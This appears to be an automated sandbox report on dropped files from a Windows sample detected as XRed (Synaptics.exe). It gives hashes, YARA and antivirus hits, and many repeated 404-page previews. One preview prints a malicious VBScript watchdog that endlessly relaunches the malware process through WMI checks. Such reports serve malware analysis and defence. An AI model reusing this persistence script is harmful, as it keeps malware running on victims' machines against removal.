                                                                                                                                                      SHA-256:7CBE965FA1278BA09C31E191C19AC1E2B52F940B656273872C805833AE03E276
                                                                                                                                                      SHA-512:2A6D87585971CF166D4DF1B2BCFE80A8B066D1CF4CBF646ADDF0735B62644AB5D9624B635AA1BA89B0B36107FD2899BEC2F95D6A55D2FAFF579272E1E758FE98
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                      Process:C:\Users\user\Desktop\JPS.exe
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):26
                                                                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.268492288302175
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+05r7SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+qr7+pAZewRDK4mW
                                                                                                                                                      MD5:0F4759D5D7DD5A3E18FEFB4A589E1D04
                                                                                                                                                      SHA1:A0B4EA8FD07FE324D209C882CDA2EE6409E13D1C
                                                                                                                                                      SHA-256:523032606C9F9B19162E1D0285B26830ECE4F50FAAC090867A5C04FDAEE97CA4
                                                                                                                                                      SHA-512:281E3E430DDF8923B53E8BD53A32575CB5D49DC17D03147A7174ED5F8E081959823E17D8AFF2B1F03C6A02ACE6885CD2F9D6D225C968E4C58A7A60D1E2705D5C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WcMdG3StN37JVoGzhP0aFA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.254645603465677
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0GXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+P+pAZewRDK4mW
                                                                                                                                                      MD5:E2F18FA30355020FB65D4C63C6980234
                                                                                                                                                      SHA1:06838007A887270C05DEA26FE437C5CA77EC6958
                                                                                                                                                      SHA-256:BF3C6A9BB2A2808B7249A8C0F8AD27F5A2488D492214F668304E5E396A564182
                                                                                                                                                      SHA-512:6618409A3B5C147871304EEE2D794204B83328191A10CDE7CBCBB57B34B02D2F36D242310459C39F693077233E2840D66A93FB405E18800D75A4E6B18A8E7835
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="_owvgnCMHmz9wYsEcIy-zw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.257325372241308
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0hn3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+K3+pAZewRDK4mW
                                                                                                                                                      MD5:D21F66769921324B59169EDF17D25820
                                                                                                                                                      SHA1:4283E3EEF5A470D4DA9304D07D9227D2ADCC5FAB
                                                                                                                                                      SHA-256:599F64A1D1FBF05E15E5F21F32052B9184DB236AEBE184E1BC5CE3AEAAA5361F
                                                                                                                                                      SHA-512:3C5EB801900C63BA7323F88DD28B28CAB17A427301A22AAB3C707D9D36037B0E0D19929CA6B1E4A67C37155FE1F7783F637A643B8935269DA2115266341A5213
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="aCGz7WkWsupiQs4wxBcB7Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                                      Process:C:\Users\user\Desktop\._cache_JPS.exe
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):831
                                                                                                                                                      Entropy (8bit):5.338177797250752
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:dF/UFJr/eU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/UFJbLt+G+7xLxe0WABNVIqZaVzgA
                                                                                                                                                      MD5:43CF172F7E11D56D668B38F3A1E71A27
                                                                                                                                                      SHA1:E2E8F56F15480155E0A48BAAA20F00DB962BD7E5
                                                                                                                                                      SHA-256:DB500A62A20732754483F5F6D4AB0F45B58812BE1B6A40D6EB52367C947A7A2D
                                                                                                                                                      SHA-512:0717AAC5F99EF8C8004B9D0E1F36E6EA3EF07D4989D10C18581FE057B6935AC8F954A92EB9195673CC0A9E128A02A0D0C90F91DF5FFC2D964594A0A5EA488AB3
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, Author: Joe Security
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      Preview:
                                                                                                                                                      On error resume next
                                                                                                                                                      Dim strComputer,strProcess,fileset
                                                                                                                                                      strProcess = "._cache_JPS.exe"
                                                                                                                                                      fileset = """C:\Users\user\Desktop\._cache_JPS.exe"""
                                                                                                                                                      strComputer = "."
                                                                                                                                                      Dim objShell
                                                                                                                                                      Set objShell = CreateObject("WScript.Shell")
                                                                                                                                                      Dim fso
                                                                                                                                                      Set fso = CreateObject("Scripting.FileSystemObject")
                                                                                                                                                      while 1
                                                                                                                                                      IF isProcessRunning(strComputer,strProcess) THEN
                                                                                                                                                      ELSE
                                                                                                                                                      objShell.Run fileset
                                                                                                                                                      END IF
                                                                                                                                                      Wend
                                                                                                                                                      FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)
                                                                                                                                                      DIM objWMIService, strWMIQuery
                                                                                                                                                      strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"
                                                                                                                                                      SET objWMIService = GETOBJECT("winmgmts:" _
                                                                                                                                                      & "{impersonationLevel=impersonate}!\\" _
                                                                                                                                                      & strComputer & "\root\cimv2")
                                                                                                                                                      IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN
                                                                                                                                                      isProcessRunning = TRUE
                                                                                                                                                      ELSE
                                                                                                                                                      isProcessRunning = FALSE
                                                                                                                                                      END IF
                                                                                                                                                      END FUNCTION
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.264147676595978
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0sOSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+5O+pAZewRDK4mW
                                                                                                                                                      MD5:71614D71E9A40BFD8B90330D52D2BDF2
                                                                                                                                                      SHA1:81564133EF1D3466044EB6CED163BB7FFD5C40D7
                                                                                                                                                      SHA-256:7E4AC10D8589B74DD72FE54C9807CCBC4A1344B846FF70CE787B73FAC8953B86
                                                                                                                                                      SHA-512:163DE6869E7B95B79BEE1BBABF0A87A129567E0BFCBC1DF34FBB776CC7C5595D8B8B58CE6E391615950E4B95CBA9A99141382898F85301C301D1D8CF47EE4ABA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gVrV7dHI8ofWQjhkrNPrfA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.257557977344846
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0H4f3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+k4P+pAZewRDK4mW
                                                                                                                                                      MD5:E4A2D9DC4AC87BFD4131A9C75CC8EF98
                                                                                                                                                      SHA1:5BECFE66D99FDC641748CBC7270DDF6A442A9EE9
                                                                                                                                                      SHA-256:32FD7845A2BCA2CBF0E6A45CC8DFB55BFE1C5717EBEA6E45E7FB4B24A6068197
                                                                                                                                                      SHA-512:05A54FB3AE52DF69F2AD842CCD81FD41C1D20F12A6E081F7027C624F6BFBDF90949303B24D13A7AB00632F511CB23838115F8EBE145D8F7E0B78E1AEE1169A4B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.260251334508525
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+07ESU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+b+pAZewRDK4mW
                                                                                                                                                      MD5:B5D2A38575656D5799BD1ADF70527C4D
                                                                                                                                                      SHA1:82516A3583332A997C92B2DAEEF9034A7748C592
                                                                                                                                                      SHA-256:FEBCB3C8238F60083906684360461AD078B144B4878FBF19C5226FF733F428F5
                                                                                                                                                      SHA-512:57E62AEE2C1411713054EE6A35B0369E0356A8C37381D897FB06648314A36A1B5EE5E8F64FBB66439D0257AB73E25D8073295BF88E545663469DFB4CA3F9C362
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2601464027522855
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0BkSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK++k+pAZewRDK4mW
                                                                                                                                                      MD5:A9D44F988504A99585E5B7AB768C8919
                                                                                                                                                      SHA1:8979FCC851D32E45C80A544B6E7ECBED9724975E
                                                                                                                                                      SHA-256:BFF7CF387C1CE4ED73A1BFB2F652D38D2822489B8B41CF1E31CE0E7D3748D063
                                                                                                                                                      SHA-512:956403DCA8428BD978596763E6901A2DD487836BB98779AAD80E1BFF1BF41280D1F908BAD3B6952199D3D42A8568E954A71AD9602CEBDBC93E91172CE5286197
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.26202314889096
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0c1XSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+zX+pAZewRDK4mW
                                                                                                                                                      MD5:93F31B716C46213B186D4FD9C6E3C728
                                                                                                                                                      SHA1:E459E481FE68DAA0C0267E540455CF78EB48350E
                                                                                                                                                      SHA-256:BCF206BA373E168C5A2967BCB936CED029A1C4087A8631EE7663CDFEA458E36F
                                                                                                                                                      SHA-512:401368E631C65DBAD8976628B3ACE9DA469B492EFB1A98C26ECF4C49904088D861C072C3D2EAF7C359174908D80F15CEF9DA102F9F3B61F3197337151B091FE8
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.249384897078481
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0hpWSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+08+pAZewRDK4mW
                                                                                                                                                      MD5:8B173ACEC03085A950D4E905F241C59A
                                                                                                                                                      SHA1:DDE53748F0ED4F4AE92D814F92C03AD1770CA23B
                                                                                                                                                      SHA-256:8F260BA250E1013B2B5251A11729BD433F40BB99240C6E386C29AEB6F0F147D9
                                                                                                                                                      SHA-512:8E0A93609F9B6F1439CDD2D4571F6A712FEC0347E25863443B69745DE7B067F995DF8EE7C55D7B87206F382434A58AC2C4D8A150F0CAB53F5047F1F481A6B1EC
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.257283839940624
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0cESU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+a+pAZewRDK4mW
                                                                                                                                                      MD5:A19844AE9AC2FB8DE1E4A094572D85EC
                                                                                                                                                      SHA1:2FDB201EB42A7135A732C9F02C59DB1D240C9E24
                                                                                                                                                      SHA-256:F9579F7540688231D4CC439596AF98D2024211315CAEDA8FC5F8134B36D9E908
                                                                                                                                                      SHA-512:A38087BE4E615861F9289737624B6D823ABA5861AA44B24D3F94A5F9769597F13F8188E15451707B4D01F3E91BA5B34E98C35FA815A324C4270B7D99F56377BE
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:Microsoft Excel 2007+
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):18387
                                                                                                                                                      Entropy (8bit):7.523057953697544
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                      MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                      SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                      SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                                      SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.270010384867604
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+07SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+c+pAZewRDK4mW
                                                                                                                                                      MD5:70AC3D1EE9ADABB4E69EAB29AFC6BC1E
                                                                                                                                                      SHA1:0A0A6C8A0670146737576F68FA06E646AA10BF15
                                                                                                                                                      SHA-256:33D5FCDCEE92C3816DD4728D656CA3524CDEEB8AE353E091D168F7D4F75367DE
                                                                                                                                                      SHA-512:11D5FEEEA7980F2EEBA1FCC0D6F4202AF8709C296297541C09E5FC412468A37E3DAEDF894480E9DD497517CE57428B74810770D48EF1CDEEE7E463219C404F41
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ipjEpqhVXqYULv9YDQow4Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.254131385205729
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+06eMDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+V+pAZewRDK4mW
                                                                                                                                                      MD5:79B38BEB68E1D97721E2E4BEFAD8E3A4
                                                                                                                                                      SHA1:5277DF78915CDFF408BD3A0217294D31FE7AB846
                                                                                                                                                      SHA-256:F4149A8F4072D0F483646BBE102FEF3D4046B7E4DF119E413487A0AEC11C8307
                                                                                                                                                      SHA-512:DFA21AC2A98929EEF6AC70A0EB2009336E8492CB9982F49E6BB1933A35558DD1066B7FDCB2A2F6D9081E1ACA2B3F1F0E6B93CFCDA70BDD57080C96B0606585B4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.264362414263429
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0ySU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+l+pAZewRDK4mW
                                                                                                                                                      MD5:15C52094EE81C0EDF0C82DAF26097B63
                                                                                                                                                      SHA1:FE4A37D74E9E1B7D0E44077CF98E7B0DCFD54C40
                                                                                                                                                      SHA-256:30AD3BE2718C002E1EB72FD2D27B5D0B068A38175F8F8967652722FE2E78067A
                                                                                                                                                      SHA-512:CB9C2F970B7006B2BD5805299553589AA4DAF9038E7C37FBCD54DB0592D2C0B4A326779A4B3E5DFE7B8FA410A7FB3993BDE3A47BDEF3489D745E787B6FE95B84
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.274876684912383
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0gxxSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+r+pAZewRDK4mW
                                                                                                                                                      MD5:62CC759E587B9FDBB175D48757760AF0
                                                                                                                                                      SHA1:83FD78398E29B12167DB542A3A323D05AEEADA24
                                                                                                                                                      SHA-256:5D1CBEFE8DFAA432D8CA86D743A94529698127842621F907F5C4C61EA2F97B3F
                                                                                                                                                      SHA-512:75F1257E94B05D63EBB1FBD0A2BC0B7B94CF45C8AC0746DA1CF1BC0D69850B1368D15A4A73BA080DB4E87C6480FD6D535D70620D8F422C469537936910BA54F3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.258498303926086
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0bSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+k+pAZewRDK4mW
                                                                                                                                                      MD5:5E55BB1BF6A3E1BA14F246525D2921E4
                                                                                                                                                      SHA1:3F0A0607BD48CB09DC1CACD09EBC34E71395A0A4
                                                                                                                                                      SHA-256:E88FC7FF610996C0A0D841FE8E5E9413DD85F37609D8D86AA6DB0D1BC0E66279
                                                                                                                                                      SHA-512:242491B43A4DB8E39804A2F52C9ABA410215ADC1E3DDF4053076AD32BACFB334E77FDA7BA80ABA1E985C24C8B65A2D0A373AF28A85C92AA228E01F1C7723E08B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2650831310280255
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0f6SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+U6+pAZewRDK4mW
                                                                                                                                                      MD5:B2CD49CCCF11AA3F033469D7A99D0B64
                                                                                                                                                      SHA1:A2881E7799FCE3D078C1CA4A125888EAA3E72322
                                                                                                                                                      SHA-256:4478BBC319AB0243CF6F7AA1AB0666A2D6CE35E9F40CCB9AF1DF6643251F99B3
                                                                                                                                                      SHA-512:C5B8CCCEFCB89362627EBB4CA2C93EB0C3004335398C1E66D2A2B827A3DC6CBAE7DA76FFCFB9C88739DE8AA89821804972DAC38BD1E3363BD2919A725A3E6D74
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.264009307072822
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0rSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+o+pAZewRDK4mW
                                                                                                                                                      MD5:2AB5C9C88B1713E3442750F2FE37BDA8
                                                                                                                                                      SHA1:91E8D110D22B9B72DB409DD5BC4E01E1376F79C4
                                                                                                                                                      SHA-256:06B78D4719E4F693796B18F9B4CDD5BB66FD2FC430670AD8E0957EF23A600E92
                                                                                                                                                      SHA-512:CDBE8E00733D50C5C5FF6D97C0807A27230A1C76857AD62101CBFA8B068D63E49DADB37E1664A364BA6CA7A25AAE1878B60BD795BF56C6C1B4712D695C180592
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.267593245664725
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0gSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+L+pAZewRDK4mW
                                                                                                                                                      MD5:1CD110740ECEBF7E06C753C081F3CAE5
                                                                                                                                                      SHA1:818ED905B6988CE842974001A2E999A6264605F4
                                                                                                                                                      SHA-256:8CBF387B9F9C65DCB878BC71662B586248C87094C091F14574FD2967EAFE2AAF
                                                                                                                                                      SHA-512:1A3092059FCC2FCEBEA68FD5C3F62B61CA3230E772E8883A82EF5680E47D080709123AD898929409E332BDB0FEF265484CBFF11E32A7571D22D255270E6EDD51
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.263845096187329
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+07SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+o+pAZewRDK4mW
                                                                                                                                                      MD5:0CE19284CA5AB40C56459D2C79B11A10
                                                                                                                                                      SHA1:2561B7D717BE66584F81AAE7D06A70570BED539B
                                                                                                                                                      SHA-256:D353589A3A800104E09506DF18DA7011AA19131A6E7F69FD56DAFBC5F5F73BEE
